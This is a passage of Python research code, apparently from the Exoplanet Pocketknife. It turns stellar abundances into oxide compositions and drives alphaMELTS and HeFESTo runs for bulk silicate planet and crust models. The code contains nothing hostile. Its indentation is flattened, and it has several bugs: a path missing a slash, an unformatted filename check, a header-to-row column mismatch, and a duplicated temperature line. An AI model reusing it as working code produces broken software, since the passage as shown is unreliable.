if consol_file is True:
file_consolidate(path=infiledir, init_path=init_path)
else:
file_consolidate(path=infiledir, init_path=init_path)
scrapebsp2(infiledirectory=(home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(infile[:-4])),
inputfilename=infile)
bsprecalc(bspmeltsfilesdir=(home_dir[0] + "{}_Completed_BSP_MELTS_Files".format(infile[:-4])),
infilename=infile, alloy_mass_infile="alloy_mass.csv",
bsp_chem_infile="{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
# except:
# # raise Exception
# print("\nError! There is likely an issue with the formatting of your input file!\n"
# "Please refer to the documentation for more information.\n")
# time.sleep(8)
# initialization()
#
# sys.exit()
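# molepct() mirrors logep() but expects the input table to carry molar abundances directly
# (columns 'Fe', 'Ca', ...) rather than the logarithmic [X/H] values that logep() converts.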
def molepct(infile, infile_type, consol_file, init_path, library):
if "{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type) in os.listdir(os.getcwd()):
shutil.rmtree("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
else:
os.mkdir("{}_MELTS_{}_Input_Files".format(inputfile_list[0][:-4], infile_type))
if "{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type) in os.listdir(os.getcwd()):
os.remove("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
else:
pass
chem_outfile = open("{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type), 'a')
chem_outfile.write("Star,FeO,CaO,Al2O3,Na2O,MgO,SiO2,TiO2,Cr2O3,NiO,Mass_Alloy\n")
# try:
with open(infile, 'r') as inputfile:
if library is True:
print("\n[~] Writing MELTS {} Input Files...".format(infile_type))
else:
print("[~] Preparing consolidated MELTS output file...")
df = pd.DataFrame(pd.read_csv(inputfile))
for index, row in df.iterrows():
star_name = row['Star']
# print(star_name)
# print(row['[Fe/H]'])
# print(row['[Ca/H]'])
# print(row['[Al/H]'])
# print(row['[Na/H]'])
# print(row['[Mg/H]'])
# print(row['[Si/H]'])
# print(row['[Ti/H]'])
# print(row['[Cr/H]'])
# print("\n\n_________________________________________\n")
# print(star_name)
fe_abundance = row['Fe']
ca_abundance = row['Ca']
al_abundance = row['Al']
na_abundance = row['Na']
mg_abundance = row['Mg']
si_abundance = row['Si']
ti_abundance = row['Ti']
cr_abundance = row['Cr']
ni_abundance = row['Ni']
total_abundances = (fe_abundance + ca_abundance + al_abundance + na_abundance + mg_abundance +
si_abundance + ti_abundance + cr_abundance + ni_abundance)
# print("Input abundances:")
# print(fe_abundance, ca_abundance, al_abundance, na_abundance, mg_abundance, si_abundance,
# ti_abundance, cr_abundance, ni_abundance, total_abundances)
# print(total_abundances)
init_pct_fe = fe_abundance / total_abundances
init_pct_ca = ca_abundance / total_abundances
init_pct_al = al_abundance / total_abundances
init_pct_na = na_abundance / total_abundances
init_pct_mg = mg_abundance / total_abundances
init_pct_si = si_abundance / total_abundances
init_pct_ti = ti_abundance / total_abundances
init_pct_cr = cr_abundance / total_abundances
init_pct_ni = ni_abundance / total_abundances
init_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + init_pct_na + init_pct_mg + init_pct_si +
init_pct_ti + init_pct_cr + init_pct_ni)
# print("Init Cation%:")
# print(init_pct_fe, init_pct_ca, init_pct_al, init_pct_na, init_pct_mg, init_pct_si,
# init_pct_ti, init_pct_cr, init_pct_sum)
moles_si_remaining = adjustsi_fct(si_pct=init_pct_si)
moles_na_remaining = adjustna_fct(na_pct=init_pct_na)
#
# print("Moles Si/Na Remaining:")
# print(moles_si_remaining, moles_na_remaining)
norm_pct_sum = (init_pct_fe + init_pct_ca + init_pct_al + moles_na_remaining + init_pct_mg +
moles_si_remaining + init_pct_ti + init_pct_cr + init_pct_ni)
norm_pct_fe = init_pct_fe / norm_pct_sum
norm_pct_ca = init_pct_ca / norm_pct_sum
norm_pct_al = init_pct_al / norm_pct_sum
norm_pct_na = moles_na_remaining / norm_pct_sum
norm_pct_mg = init_pct_mg / norm_pct_sum
norm_pct_si = moles_si_remaining / norm_pct_sum
norm_pct_ti = init_pct_ti / norm_pct_sum
norm_pct_cr = init_pct_cr / norm_pct_sum
norm_pct_ni = init_pct_ni / norm_pct_sum
check_norm_sum = (
norm_pct_fe + norm_pct_ca + norm_pct_al + norm_pct_na + norm_pct_mg + norm_pct_si +
norm_pct_ti + norm_pct_cr + norm_pct_ni)
# print("Normalized Cation% After Si/Na Correction:")
# print(norm_pct_fe, norm_pct_ca, norm_pct_al, norm_pct_na, norm_pct_mg, norm_pct_si, norm_pct_ti,
# norm_pct_cr, norm_pct_ni, norm_pct_sum)
wt_feo = ((norm_pct_fe * fe_atwt) * feo_molwt) / (num_feo_cations * fe_atwt)
wt_cao = ((norm_pct_ca * ca_atwt) * cao_molwt) / (num_cao_cations * ca_atwt)
wt_al2o3 = ((norm_pct_al * al_atwt) * al2o3_molwt) / (num_al2o3_cations * al_atwt)
wt_na2o = ((norm_pct_na * na_atwt) * na2o_molwt) / (num_na2o_cations * na_atwt)
wt_mgo = ((norm_pct_mg * mg_atwt) * mgo_molwt) / (num_mgo_cations * mg_atwt)
wt_sio2 = ((norm_pct_si * si_atwt) * sio2_molwt) / (num_sio2_cations * si_atwt)
wt_tio2 = ((norm_pct_ti * ti_atwt) * tio2_molwt) / (num_tio2_cations * ti_atwt)
wt_cr2o3 = ((norm_pct_cr * cr_atwt) * cr2o3_molwt) / (num_cr2o3_cations * cr_atwt)
wt_nio = ((norm_pct_ni * ni_atwt) * nio_molwt) / (num_nio_cations * ni_atwt)
sum_oxwts = (wt_feo + wt_cao + wt_al2o3 + wt_na2o + wt_mgo + wt_sio2 + wt_tio2 + wt_cr2o3 + wt_nio)
# print("Wt Oxides:")
# print(wt_feo, wt_cao, wt_al2o3, wt_na2o, wt_mgo, wt_sio2, wt_tio2, wt_cr2o3, wt_nio, sum_oxwts)
norm_wt_feo = (wt_feo / sum_oxwts) * 100.0
norm_wt_cao = (wt_cao / sum_oxwts) * 100.0
norm_wt_al2o3 = (wt_al2o3 / sum_oxwts) * 100.0
norm_wt_na2o = (wt_na2o / sum_oxwts) * 100.0
norm_wt_mgo = (wt_mgo / sum_oxwts) * 100.0
norm_wt_sio2 = (wt_sio2 / sum_oxwts) * 100.0
norm_wt_tio2 = (wt_tio2 / sum_oxwts) * 100.0
norm_wt_cr2o3 = (wt_cr2o3 / sum_oxwts) * 100.0
norm_wt_nio = (wt_nio / sum_oxwts) * 100.0
norm_wt_sum_check = (norm_wt_feo + norm_wt_cao + norm_wt_al2o3 + norm_wt_na2o + norm_wt_mgo +
norm_wt_sio2 + norm_wt_tio2 + norm_wt_cr2o3 + norm_wt_nio)
# print(star_name)
# print(norm_wt_feo, norm_wt_cao, norm_wt_al2o3, norm_wt_na2o, norm_wt_mgo, norm_wt_sio2,
# norm_wt_tio2, norm_wt_cr2o3, norm_wt_nio, norm_wt_sum_check)
if (star_name + "_MELTS_{}_INFILE.txt") in os.listdir(os.getcwd()):
os.remove(star_name + "_MELTS_{}_INFILE.txt".format(infile_type))
else:
pass
melts_input_file = open(star_name + "_MELTS_{}_INFILE.txt".format(infile_type), 'w')
title = "Title: {}".format(star_name)
initfeo = "Initial Composition: FeO {}".format(norm_wt_feo)
initcao = "Initial Composition: Cao {}".format(norm_wt_cao)
inital2o3 = "Initial Composition: Al2O3 {}".format(norm_wt_al2o3)
initna2o = "Initial Composition: Na2O {}".format(norm_wt_na2o)
initmgo = "Initial Composition: MgO {}".format(norm_wt_mgo)
initsio2 = "Initial Composition: SiO2 {}".format(norm_wt_sio2)
inittio2 = "Initial Composition: TiO2 {}".format(norm_wt_tio2)
initcr2o3 = "Initial Composition: Cr2O3 {}".format(norm_wt_cr2o3)
initnio = "Initial Composition: NiO {}".format(norm_wt_nio)
init_temp = 'Initial Temperature: 2000'
final_temp = "Final Temperature: 800"
inc_temp = "Increment Temperature: -5"
init_press = "Initial Pressure: 500"
final_press = "Final Pressure: 500"
dpdt = "dp/dt: 0"
mode = "Mode: Fractionate Solids"
mode2 = "Mode: Isobaric"
melts_input_file.write(
"{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n".format(title,
initfeo,
initcao,
inital2o3,
initna2o,
initmgo,
initsio2,
inittio2,
initcr2o3,
initnio,
init_temp,
final_temp,
inc_temp,
init_press,
final_press,
dpdt, mode,
mode2))
chem_outfile.write(
"{},{},{},{},{},{},{},{},{},{}\n".format(star_name, norm_wt_feo, norm_wt_cao, norm_wt_al2o3,
norm_wt_na2o, norm_wt_mgo, norm_wt_sio2, norm_wt_tio2,
norm_wt_cr2o3, norm_wt_nio))
melts_input_file.close()
shutil.move((os.getcwd() + "/" + star_name + "_MELTS_{}_INFILE.txt".format(infile_type)),
(os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type)
+ star_name + "_MELTS_{}_INFILE.txt".format(infile_type)))
infiledir = os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type)
if library is True:
print("[~] MELTS {} Input Files Written!".format(infile_type))
print("[~] MELTS files stored in " + (os.getcwd()))
else:
pass
# print("[~] Launching alphaMELTS for {} Calculations...".format(infile_type))
infiledir = (os.getcwd() + "/{}_MELTS_{}_Input_Files/".format(inputfile_list[0][:-4], infile_type))
print("[~] Launching alphaMELTS for {} Calculations...".format(infile_type))
runmelts_bsp(infile_directory=infiledir, inputfilename=infile)
chem_outfile.close()
if consol_file is True:
file_consolidate(path=infiledir, init_path=init_path)
else:
file_consolidate(path=infiledir, init_path=init_path)
scrapebsp2(infiledirectory=(home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(infile[:-4])), inputfilename=infile)
    bsprecalc(bspmeltsfilesdir=(home_dir[0] + "/{}_Completed_BSP_MELTS_Files".format(infile[:-4])),
infilename=infile, alloy_mass_infile="alloy_mass.csv",
bsp_chem_infile="{}_{}_ConsolidatedChemFile.csv".format(infile[:-4], infile_type))
# except:
# raise Exception
# # print("\nError! There is likely an issue with the formatting of your input file!\n"
# # "Please refer to the documentation for more information.\n")
# time.sleep(8)
# initialization()
# sys.exit()
def bsprecalc(bspmeltsfilesdir, infilename, alloy_mass_infile, bsp_chem_infile):
if "{}_BSP_Composition.csv".format(infilename[:-4]) in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}_BSP_Composition.csv".format(infilename[:-4]))
bsp_chemfile = open("{}_BSP_Composition.csv".format(infilename[:-4]), 'a')
bsp_comp_header = "Star,FeO,Na2O,MgO,Al2O3,SiO2,CaO,TiO2,Cr2O3"
bsp_chemfile.write("{}\n".format(bsp_comp_header))
if "bsp_debug.csv" in os.listdir(os.getcwd()):
os.remove("bsp_debug.csv")
bsp_debug = open("bsp_debug.csv", 'a')
if os.path.exists(home_dir[0] + "/MELTS_MORB_Input_Files"):
shutil.rmtree(home_dir[0] + "/MELTS_MORB_Input_Files")
else:
pass
os.mkdir(home_dir[0] + "/MELTS_MORB_Input_Files")
# need to build in the MELTS file parser to extract alloy info
# construct it so that it extracts alloy and chemistry, and the write to file with predictable headers
# for i in os.listdir(os.getcwd()):
df_chem = pd.read_csv(bsp_chem_infile)
df_alloy = pd.read_csv(alloy_mass_infile)
for row in df_chem.index:
try:
# print(df_chem)
# print(df_chem.index)
star_name = df_chem['Star'][row]
feo_in = df_chem['FeO'][row]
na2o_in = df_chem['Na2O'][row]
mgo_in = df_chem['MgO'][row]
al2o3_in = df_chem['Al2O3'][row]
sio2_in = df_chem['SiO2'][row]
cao_in = df_chem['CaO'][row]
nio_in = df_chem['NiO'][row]
tio2_in = df_chem['TiO2'][row]
cr2o3_in = df_chem['Cr2O3'][row]
in1_header = "1,feo,na2o,mgo,al2o3,sio2,cao,nio,tio2,cr2o3"
in1 = ",{},{},{},{},{},{},{},{},{}".format(feo_in, na2o_in, mgo_in, al2o3_in, sio2_in, cao_in, nio_in, tio2_in, cr2o3_in)
bsp_debug.write("{}\n{}\n".format(in1_header, in1))
for row in df_alloy.index:
star_name2 = df_alloy['star'][row]
alloy_mass = df_alloy['alloy mass'][row]
if star_name == star_name2:
feo_moles = feo_in / feo_molwt
na2o_moles = na2o_in / na2o_molwt
mgo_moles = mgo_in / mgo_molwt
al2o3_moles = al2o3_in / al2o3_molwt
sio2_moles = sio2_in / sio2_molwt
cao_moles = cao_in / cao_molwt
nio_moles = nio_in / nio_molwt
tio2_moles = tio2_in / tio2_molwt
cr2o3_moles = cr2o3_in / cr2o3_molwt
in2_header = "2,feo,na2o,mgo,al2o3,sio2,cao,nio,tio2,cr2o3"
in2 = ",{},{},{},{},{},{},{},{},{}".format(feo_moles, na2o_moles, mgo_moles, al2o3_moles, sio2_moles, cao_moles, nio_moles, tio2_moles, cr2o3_moles)
bsp_debug.write("{}\n{}\n".format(in2_header, in2))
fe_moles = feo_moles * num_feo_cations
na_moles = na2o_moles * num_na2o_cations
mg_moles = mgo_moles * num_mgo_cations
al_moles = al2o3_moles * num_al2o3_cations
si_moles = sio2_moles * num_sio2_cations
ca_moles = cao_moles * num_cao_cations
ni_moles = nio_moles * num_nio_cations
ti_moles = tio2_moles * num_tio2_cations
cr_moles = cr2o3_moles * num_cr2o3_cations
in3_header = "3,fe,na,mg,al,si,ca,ni,ti,cr"
in3 = ",{},{},{},{},{},{},{},{},{}".format(fe_moles, na_moles, mg_moles, al_moles,
si_moles, ca_moles, ni_moles, ti_moles, cr_moles)
bsp_debug.write("{}\n{}\n".format(in3_header, in3))
fe_mass = fe_moles * fe_atwt
na_mass = na_moles * na_atwt
mg_mass = mg_moles * mg_atwt
al_mass = al_moles * al_atwt
si_mass = si_moles * si_atwt
ca_mass = ca_moles * ca_atwt
ni_mass = ni_moles * ni_atwt
ti_mass = ti_moles * ti_atwt
cr_mass = cr_moles * cr_atwt
in4_header = "4,fe,na,mg,al,si,ca,ni,ti,cr"
in4 = ",{},{},{},{},{},{},{},{},{}".format(fe_mass, na_mass, mg_mass, al_mass,
si_mass, ca_mass, ni_mass, ti_mass, cr_mass)
bsp_debug.write("{}\n{}\n".format(in4_header, in4))
alloy_subt_ni_mass = alloy_mass - ni_mass
if alloy_subt_ni_mass < 0:
print("Ni MASS ERROR!")
sys.exit()
else:
pass
new_mass_fe = fe_mass - alloy_subt_ni_mass
if new_mass_fe < 0:
print("Fe MASS ERROR!")
sys.exit()
remaining_moles_fe = new_mass_fe / fe_atwt
remaining_moles_feo = remaining_moles_fe * num_feo_cations
remaining_mass_feo = remaining_moles_feo * feo_molwt
in5_header = "5,alloy_but_ni_mass,new_mass_fe,remaining_moles_fe,remaining_moles_feo,remaining_mass_feo"
in5 = ",{},{},{},{},{}".format(alloy_subt_ni_mass, new_mass_fe, remaining_moles_fe, remaining_moles_feo,
remaining_mass_feo)
bsp_debug.write("{}\n{}\n".format(in5_header, in5))
unnormalized_sum = (remaining_mass_feo + na2o_in + mgo_in + al2o3_in + sio2_in + cao_in +
tio2_in + cr2o3_in)
norm_feo = remaining_mass_feo / unnormalized_sum * 100.0
norm_na2o = na2o_in / unnormalized_sum * 100.0
norm_mgo = mgo_in / unnormalized_sum * 100.0
norm_al2o3 = al2o3_in / unnormalized_sum * 100.0
norm_sio2 = sio2_in / unnormalized_sum * 100.0
norm_cao = cao_in / unnormalized_sum * 100.0
norm_tio2 = tio2_in / unnormalized_sum * 100.0
norm_cr2o3 = cr2o3_in / unnormalized_sum * 100.0
norm_sum = norm_feo + norm_na2o + norm_mgo + norm_al2o3 + norm_sio2 + norm_cao + norm_tio2 + norm_cr2o3
in6_header = "6,feo,na2o,mgo,al2o3,sio2,cao,tio2,cr2o3,unnorm_sum,norm_sum"
in6 = ",{},{},{},{},{},{},{},{},{},{}".format(norm_feo, norm_na2o, norm_mgo, norm_al2o3,
norm_sio2, norm_cao, norm_tio2, norm_cr2o3, unnormalized_sum, norm_sum)
bsp_debug.write("{}\n{}\n".format(in6_header, in6))
bsp_comp = "{},{},{},{},{},{},{},{},{}".format(star_name, norm_feo, norm_na2o, norm_mgo, norm_al2o3,
norm_sio2, norm_cao, norm_tio2, norm_cr2o3)
bsp_chemfile.write("{}\n".format(bsp_comp))
# print(norm_feo)
# print(norm_sum)
#
# if norm_sum != 100.0:
# print("ERROR! NORMALIZED SUM IS NOT 100.0!")
# sys.exit()
title = "Title: {}".format(star_name)
bsp_feo = "Initial Composition: FeO {}".format(norm_feo)
bsp_na2o = "Initial Composition: Na2O {}".format(norm_na2o)
bsp_mgo = "Initial Composition: MgO {}".format(norm_mgo)
bsp_al2o3 = "Initial Composition: Al2O3 {}".format(norm_al2o3)
bsp_sio2 = "Initial Composition: SiO2 {}".format(norm_sio2)
bsp_cao = "Initial Composition: CaO {}".format(norm_cao)
bsp_tio2 = "Initial Composition: TiO2 {}".format(norm_tio2)
bsp_cr2o3 = "Initial Composition: Cr2O3 {}".format(norm_cr2o3)
init_temp = 'Initial Temperature: 2000'
final_temp = "Final Temperature: 800"
inc_temp = "Increment Temperature: -5"
init_press = "Initial Pressure: 10000"
final_press = "Final Pressure: 10000"
dpdt = "dp/dt: 0"
mode = "Mode: Fractionate Solids"
mode2 = "Mode: Isobaric"
melts_morb_input_file_vars = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}".format(
title,
bsp_feo, bsp_na2o, bsp_mgo, bsp_al2o3, bsp_sio2, bsp_cao, bsp_tio2, bsp_cr2o3,
init_temp, init_temp, final_temp, inc_temp, init_press, final_press, dpdt, mode, mode2)
morb_outfile = open("{}_MELTS_{}_INFILE.txt".format(star_name, "MORB"), 'w')
morb_outfile.write(melts_morb_input_file_vars)
morb_outfile.close()
fdir = os.getcwd() + "/{}_MELTS_{}_INFILE.txt".format(star_name, "MORB")
tdir = home_dir[0] + "/MELTS_MORB_Input_Files/{}_MELTS_{}_INFILE.txt".format(star_name, "MORB")
shutil.move(fdir, tdir)
except:
pass
bsp_debug.close()
bsp_chemfile.close()
hefestofilewriter_bsp(bulkfile=(home_dir[0] + "/{}_BSP_Composition.csv".format(infilename[:-4])), infilename=infilename)
runmelts_morb(infile_directory=(home_dir[0] + "/MELTS_MORB_Input_Files"), inputfilename=infilename[:-4])
def runmelts_morb(infile_directory, inputfilename):
if "{}_Completed_MORB_MELTS_Files".format(inputfilename) in os.listdir(os.getcwd()):
shutil.rmtree("{}_Completed_MORB_MELTS_Files".format(inputfilename))
os.mkdir("{}_Completed_MORB_MELTS_Files".format(inputfilename))
else:
os.mkdir("{}_Completed_MORB_MELTS_Files".format(inputfilename))
for i in os.listdir(infile_directory):
os.chdir(home_dir[0])
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
os.remove("alphaMELTS_tbl.txt")
else:
pass
shutil.copy((infile_directory + "/" + i), (home_dir[0] + "/" + i))
print("[~] Running MORB calculations for: {}".format(i[:-20]))
p = subprocess.Popen(["run_alphamelts.command", "-f", "MORB_Env_File"], stdin=subprocess.PIPE)
t = Timer(300, p.kill)
t.start()
print("\nTimeout timer started. 300 seconds until the loop continues...\n")
p.communicate(input=b"\n".join(
[b"1", i, b"8", b"alloy-liquid", b"0", b"x", b"5", b"3", b"+0.4", b"2", b"1400", b"10000", b"10", b"1",
b"3", b"1", b"liquid", b"1", b"0.05", b"0", b"10", b"0", b"4", b"0"]))
t.cancel()
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
oldname = "alphaMELTS_tbl.txt"
newname = i[:-20] + "_MORB_OUTPUT"
os.rename(oldname, newname)
shutil.move(newname, home_dir[0] + "/{}_Completed_MORB_MELTS_Files".format(inputfilename))
os.remove(i)
os.chdir(home_dir[0] + "/{}_Completed_MORB_MELTS_Files".format(inputfilename))
csv_file_name = newname + ".csv"
            with open(newname, 'r') as infile, open(csv_file_name, 'w') as outfile:
in_txt = csv.reader(infile, delimiter=" ")
out_csv = csv.writer(outfile)
out_csv.writerows(in_txt)
infile.close()
outfile.close()
os.remove(newname)
print("[~] {} MORB calculation processed!".format(i[:-17]))
else:
print("[X] {} MORB calculation FAILED!".format(i[:-20]))
pass
        if i in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}".format(i))
else:
pass
scrapemorb(infiledirectory=(home_dir[0] + "/{}_Completed_MORB_MELTS_Files".format(inputfilename)), infilename=inputfilename)
def scrapebsp2(infiledirectory, inputfilename):
if "alloy_mass.csv" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/alloy_mass.csv")
else:
pass
alloy_mass_outfile = open(home_dir[0] + "/alloy_mass.csv", 'a')
alloy_mass_outfile.write("{},{}\n".format("star", "alloy mass"))
os.chdir(infiledirectory)
for i in os.listdir(os.getcwd()):
try:
os.chdir(infiledirectory)
            # only scrape output files large enough to hold a full MELTS table
            # (the 100-byte size threshold is an assumption)
            if os.path.getsize(i) >= 100:
alloy_abundance = []
with open(i, 'r') as infile:
reader = csv.reader(infile)
row1 = next(reader)
star_name = row1[1]
alloy_abundance.append(star_name)
for num, line in enumerate(reader, 1):
if "Phase" in line:
csv_list = list(reader)
alloy_index = csv_list[0].index("alloy-solid_0")
for row in csv_list[1:]:
if not row == []:
a = row[alloy_index]
x = str(float(a))
alloy_abundance.append(x)
else:
break
else:
pass
os.chdir(home_dir[0])
# print(alloy_abundance[1:])
alloy_abundance_nums = []
for z in alloy_abundance[1:]:
alloy_abundance_nums.append(float(z))
alloy_abundance_sum = sum(alloy_abundance_nums)
print("Alloy abundance for {}: {}".format(alloy_abundance[0], alloy_abundance_sum))
alloy_mass_outfile.write("{},{}\n".format(alloy_abundance[0], alloy_abundance_sum))
except:
pass
else:
pass
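# The two hefestofilewriter_* functions below write HeFESTo control files: a couple of
# run-control lines, the six oxide components (Si, Mg, Fe, Ca, Al, Na) with their molar
# amounts, and then the fixed phase/endmember list that is embedded in the format string.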
def hefestofilewriter_bsp(bulkfile, infilename):
os.chdir(home_dir[0])
infilename = infilename[:-4]
if os.path.exists("{}_BSP_HeFESTo_Input_Files".format(infilename)):
shutil.rmtree("{}_BSP_HeFESTo_Input_Files".format(infilename))
else:
pass
os.mkdir("{}_BSP_HeFESTo_Input_Files".format(infilename))
bulkfile_df = pd.read_csv(bulkfile)
for row in bulkfile_df.index:
try:
star = bulkfile_df["Star"][row]
si = bulkfile_df["SiO2"][row]
mg = bulkfile_df["MgO"][row]
fe = bulkfile_df["FeO"][row]
ca = bulkfile_df["CaO"][row]
al = bulkfile_df["Al2O3"][row]
na = bulkfile_df["Na2O"][row]
hefesto_bsp_file = open("{}_BSP_HeFESTo_Infile.txt".format(star), 'a')
format_of_file = "0,20,80,1600,0,-2,0\n6,2,4,2\noxides\nSi {} 5.39386 0\nMg {} 2.71075 0\n" \
"Fe {} .79840 0\nCa {} .31431 0\nAl {} .96680 0\n" \
"Na {} .40654 0\n1,1,1\ninv251010\n47\nphase plg\n1\nan\nab\nphase sp\n0\nsp\nhc\n" \
"phase opx\n1\nen\nfs\nmgts\nodi\nphase c2c\n0\nmgc2\nfec2\nphase cpx\n1\ndi\nhe\ncen\ncats\njd\n" \
"phase gt\n0\npy\nal\ngr\nmgmj\njdmj\nphase cpv\n0\ncapv\nphase ol\n1\nfo\nfa\nphase wa\n0\nmgwa\nfewa\n" \
"phase ri\n0\nmgri\nferi\nphase il\n0\nmgil\nfeil\nco\nphase pv\n0\nmgpv\nfepv\nalpv\nphase ppv\n0\nmppv\n" \
"fppv\nappv\nphase cf\n0\nmgcf\nfecf\nnacf\nphase mw\n0\npe\nwu\nphase qtz\n1\nqtz\nphase coes\n0\ncoes\n" \
"phase st\n0\nst\nphase apbo\n0\napbo\nphase ky\n0\nky\nphase neph\n0\nneph".format(si,
mg, fe, ca, al, na)
hefesto_bsp_file.write(format_of_file)
hefesto_bsp_file.close()
fdir = home_dir[0] + "/{}".format("{}_BSP_HeFESTo_Infile.txt".format(star))
tdir = home_dir[0] + "/{}/{}".format("{}_BSP_HeFESTo_Input_Files".format(infilename),
"{}_BSP_HeFESTo_Infile.txt".format(star))
shutil.move(fdir, tdir)
except:
pass
print("\n[~] BSP HeFESTo input files available in '{}'".format("{}_BSP_HeFESTo_Input_Files".format(infilename)))
def hefestofilewriter_morb(bulkfile, infilename):
os.chdir(home_dir[0])
if os.path.exists("{}_MORB_HeFESTo_Input_Files".format(infilename)):
shutil.rmtree("{}_MORB_HeFESTo_Input_Files".format(infilename))
else:
pass
os.mkdir("{}_MORB_HeFESTo_Input_Files".format(infilename))
bulkfile_df = pd.read_csv(bulkfile)
for row in bulkfile_df.index:
try:
star = bulkfile_df["Star"][row]
si = bulkfile_df["SiO2"][row]
mg = bulkfile_df["MgO"][row]
fe = bulkfile_df["FeO"][row]
ca = bulkfile_df["CaO"][row]
al = bulkfile_df["Al2O3"][row]
na = bulkfile_df["Na2O"][row]
hefesto_morb_file = open("{}_MORB_HeFESTo_Infile.txt".format(star), 'a')
format_of_file = "0,20,80,1200,0,-2,0\n6,2,4,2\noxides\nSi {} 5.33159 0\n" \
"Mg {} 1.37685 0\nFe {} .55527 0\n" \
"Ca {} 1.33440 0\nAl {} 1.82602 0\n" \
"Na {} 0.71860 0\n1,1,1\ninv251010\n47\nphase plg\n1\nan\nab\nphase sp\n0\nsp\n" \
"hc\nphase opx\n1\nen\nfs\nmgts\nodi\nphase c2c\n0\nmgc2\nfec2\nphase cpx\n1\ndi\nhe\ncen\ncats\n" \
"jd\nphase gt\n0\npy\nal\ngr\nmgmj\njdmj\nphase cpv\n0\ncapv\nphase ol\n1\nfo\nfa\nphase wa\n0\n" \
"mgwa\nfewa\nphase ri\n0\nmgri\nferi\nphase il\n0\nmgil\nfeil\nco\nphase pv\n0\nmgpv\nfepv\nalpv\n" \
"phase ppv\n0\nmppv\nfppv\nappv\nphase cf\n0\nmgcf\nfecf\nnacf\nphase mw\n0\npe\nwu\nphase qtz\n" \
"1\nqtz\nphase coes\n0\ncoes\nphase st\n0\nst\nphase apbo\n0\napbo\nphase ky\n0\nky\nphase neph\n" \
"0\nneph".format(si, mg, fe, ca, al, na)
hefesto_morb_file.write(format_of_file)
hefesto_morb_file.close()
fdir = home_dir[0] + "/{}".format("{}_MORB_HeFESTo_Infile.txt".format(star))
tdir = home_dir[0] + "/{}/{}".format("{}_MORB_HeFESTo_Input_Files".format(infilename),
"{}_MORB_HeFESTo_Infile.txt".format(star))
shutil.move(fdir, tdir)
except:
pass
print("\n[~] Crust HeFESTo input files available in '{}'".format("{}_MORB_HeFESTo_Input_Files".format(infilename)))
consol_hefestofolders(infilename=infilename)
def consol_hefestofolders(infilename):
print('\n[~] Consolidating HeFESTo input file folders...')
bsp_folder = "/{}_BSP_HeFESTo_Input_Files".format(infilename)
morb_folder = "/{}_MORB_HeFESTo_Input_Files".format(infilename)
print("[~] Got HeFESTo BSP folder '{}'".format(bsp_folder))
print("[~] Got HeFESTo Crust folder '{}'".format(morb_folder))
if "{}_HeFESTo_Input_Files".format(infilename) in os.listdir(os.getcwd()):
shutil.rmtree("{}_HeFESTo_Input_Files".format(infilename))
else:
pass
consol_folder = (home_dir[0] + "/{}_HeFESTo_Input_Files".format(infilename))
print("\n[~] Created consolidated HeFESTo input file folder: {}".format(consol_folder))
fdir_bsp = (home_dir[0] + bsp_folder)
fdir_morb = (home_dir[0] + morb_folder)
tdir_bsp = consol_folder + bsp_folder
tdir_morb = consol_folder + morb_folder
shutil.move(fdir_bsp, tdir_bsp)
shutil.move(fdir_morb, tdir_morb)
print("\n[~] HeFESTo Input files are now available in {} for transfer to a HeFESTo VM".format(consol_folder))
print("\n[~] Please move this script and folder '{}' to a working HeFESTo directory!".format(consol_folder))
print("[~] Exiting the Exoplanet Pocketknife's active processes...")
time.sleep(6)
initialization()
def runhefesto(infiledir, actual_run, runname):
os.chdir(home_dir[0])
if actual_run is True:
# try:
if 'main' not in os.listdir(os.getcwd()):
print("[X] ERROR! HeFESTo's 'main' not detected in the working directory!\n")
time.sleep(4)
initialization()
else:
print("[~] HeFESTo detected in the working directory!\n")
pass
# os.chdir(home_dir[0])
# print("\nPlease enter the name of your BSP HeFESTo input .csv sheet:")
# hefesto_input_bsp = input(">>> ")
# if hefesto_input_bsp in os.listdir(os.getcwd()):
# print("[~] {} has been found in the working directory!".format(hefesto_input_bsp))
# else:
# print("[X] {} has NOT been found in the working directory!".format(hefesto_input_bsp))
# time.sleep(4)
# initialization()
# print("\nPlease enter the name of your crust HeFESTo input .csv sheet:")
# hefesto_input_morb = input(">>> ")
# if hefesto_input_morb in os.listdir(os.getcwd()):
# print("[~] {} has been found in the working directory!".format(hefesto_input_morb))
# else:
# print("[X] {} has NOT been found in the working directory!".format(hefesto_input_morb))
# time.sleep(4)
# initialization()
#
# if os.path.exists("HeFESTo_BSP_Input_Files"):
# shutil.rmtree("HeFESTo_BSP_Input_Files")
# else:
# pass
# if os.path.exists("HeFESTo_MORB_Input_Files"):
# shutil.rmtree("HeFESTo_MORB_Input_Files")
# else:
# pass
#
# os.mkdir("HeFESTo_BSP_Input_Files")
if os.path.exists(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname)):
shutil.rmtree(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname))
else:
pass
if os.path.exists(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname)):
shutil.rmtree(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname))
else:
pass
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname))
